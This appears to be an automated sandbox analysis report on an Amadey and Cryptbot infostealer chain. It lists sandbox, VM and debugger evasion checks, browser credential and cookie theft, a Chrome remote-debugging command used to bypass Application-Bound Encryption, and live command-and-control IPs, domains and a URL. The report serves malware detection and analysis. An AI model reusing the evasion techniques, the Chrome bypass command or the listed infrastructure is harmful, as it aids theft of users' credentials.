Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 13C68E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 306FEB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: C5C68E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E26FEB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Special instruction interceptor: First address: EC4AB9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Special instruction interceptor: First address: EC4B8A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Special instruction interceptor: First address: EC2546 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Special instruction interceptor: First address: 10F5A5E instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D80DC3 rdtsc 0_2_04D80DC3
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1042 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1017 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 417 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1846 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1113 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1042 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4480 Thread sleep time: -60030s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7224 Thread sleep count: 1042 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7224 Thread sleep time: -2085042s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3192 Thread sleep count: 1017 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3192 Thread sleep time: -2035017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5968 Thread sleep count: 417 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5968 Thread sleep time: -12510000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5768 Thread sleep count: 1846 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5768 Thread sleep time: -3693846s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3320 Thread sleep count: 1113 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3320 Thread sleep time: -2227113s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7668 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7448 Thread sleep count: 1042 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7448 Thread sleep time: -2085042s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe TID: 7548 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe TID: 7552 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe TID: 7544 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe TID: 7536 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe TID: 7740 Thread sleep time: -32016s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\ Jump to behavior
Source: skotes.exe, skotes.exe, 00000006.00000002.2948123012.0000000000DDD000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: service123.exe.7.dr Binary or memory string: VMware, Inc.&1ze
Source: service123.exe.7.dr Binary or memory string: ve##?#SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: service123.exe.7.dr Binary or memory string: VMware, Inc.&&VMware20,1&VMware, Inc.&VMW201.00V.20829224.B64.2211211842&ff&fft S`
Source: service123.exe.7.dr Binary or memory string: INTEL - 6040000VMW201.00V.20829224.B64.2211211842VMware, Inc. - 10000
Source: service123.exe.7.dr Binary or memory string: VMware, Inc.
Source: service123.exe.7.dr Binary or memory string: VMware, Inc.&VMware20,1&VMware, Inc.&VMW201.00V.20829224.B64.2211211842&ff&ff
Source: service123.exe.7.dr Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver
Source: service123.exe.7.dr Binary or memory string: VMware, Inc.&&VMware20,1
Source: service123.exe.7.dr Binary or memory string: vmci.inf
Source: service123.exe.7.dr Binary or memory string: VMware20,1
Source: service123.exe.7.dr Binary or memory string: VMware, Inc.&VMware20,1328c
Source: skotes.exe, 00000006.00000002.2946416038.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2946416038.0000000000809000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: service123.exe.7.dr Binary or memory string: VMware, Inc.r
Source: service123.exe.7.dr Binary or memory string: VMwarelh
Source: service123.exe.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: file.exe, 00000000.00000002.1769420823.00000000002BD000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1813442837.0000000000DDD000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1812997349.0000000000DDD000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2948123012.0000000000DDD000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: service123.exe.7.dr Binary or memory string: VMware, Inc.&VMware20,1&VMware, Inc.&VMW201.00V.20829224.B64.2211211842&ff&ff
Source: service123.exe.7.dr Binary or memory string: ##?#SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: chrome.exe, 00000009.00000002.2838154506.000001A04CAE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D80DC3 rdtsc 0_2_04D80DC3
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00C2652B mov eax, dword ptr fs:[00000030h] 6_2_00C2652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00C2A302 mov eax, dword ptr fs:[00000030h] 6_2_00C2A302
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe "C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe" Jump to behavior
Source: skotes.exe, skotes.exe, 00000006.00000002.2948123012.0000000000DDD000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: @Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00C0D3E2 cpuid 6_2_00C0D3E2
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00C0CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_00C0CBEA
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 2.2.skotes.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.skotes.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.1772651146.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1813336112.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1766581971.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2947955226.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1772808319.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1721107752.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1812891256.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2320463326.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\AppData\Local\Temp\1008348001\843a4bb3a5.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1561321 Sample: file.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for domain / URL 2->54 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 12 other signatures 2->60 8 skotes.exe 16 2->8         started        13 file.exe 5 2->13         started        15 skotes.exe 2->15         started        process3 dnsIp4 46 185.215.113.43, 49753, 49762, 49792 WHOLESALECONNECTIONSNL Portugal 8->46 48 31.41.244.11, 49765, 80 AEROEXPRESS-ASRU Russian Federation 8->48 32 C:\Users\user\AppData\...\843a4bb3a5.exe, PE32 8->32 dropped 34 C:\Users\user\AppData\Local\...\random[1].exe, PE32 8->34 dropped 76 Hides threads from debuggers 8->76 78 Tries to detect sandboxes / dynamic malware analysis system (registry check) 8->78 80 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 8->80 17 843a4bb3a5.exe 5 2 8->17         started        36 C:\Users\user\AppData\Local\...\skotes.exe, PE32 13->36 dropped 38 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 13->38 dropped 82 Detected unpacking (changes PE section rights) 13->82 84 Tries to evade debugger and weak emulator (self modifying code) 13->84 86 Tries to detect virtualization through RDTSC time measurements 13->86 22 skotes.exe 13->22         started        file5 signatures6 process7 dnsIp8 40 fvtekk5pn.top 34.116.198.130, 49791, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 17->40 42 127.0.0.1 unknown unknown 17->42 44 home.fvtekk5pn.top 17->44 30 C:\Users\user\AppData\...\service123.exe, PE32 17->30 dropped 62 Antivirus detection for dropped file 17->62 64 Multi AV Scanner detection for dropped file 17->64 66 Attempt to bypass Chrome Application-Bound Encryption 17->66 74 6 other signatures 17->74 24 chrome.exe 17->24         started        68 Detected unpacking (changes PE section rights) 22->68 70 Machine Learning detection for dropped file 22->70 72 Tries to evade debugger and weak emulator (self modifying code) 22->72 file9 signatures10 process11 dnsIp12 50 239.255.255.250 unknown Reserved 24->50 27 chrome.exe 24->27         started        process13 dnsIp14 52 www.google.com 142.250.181.68 GOOGLEUS United States 27->52
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
239.255.255.250
 unknown Reserved
unknown unknown false
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
142.250.181.68
 www.google.com United States
15169 GOOGLEUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
home.fvtekk5pn.top 34.116.198.130 true
www.google.com 142.250.181.68 true
fvtekk5pn.top 34.116.198.130 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
    		high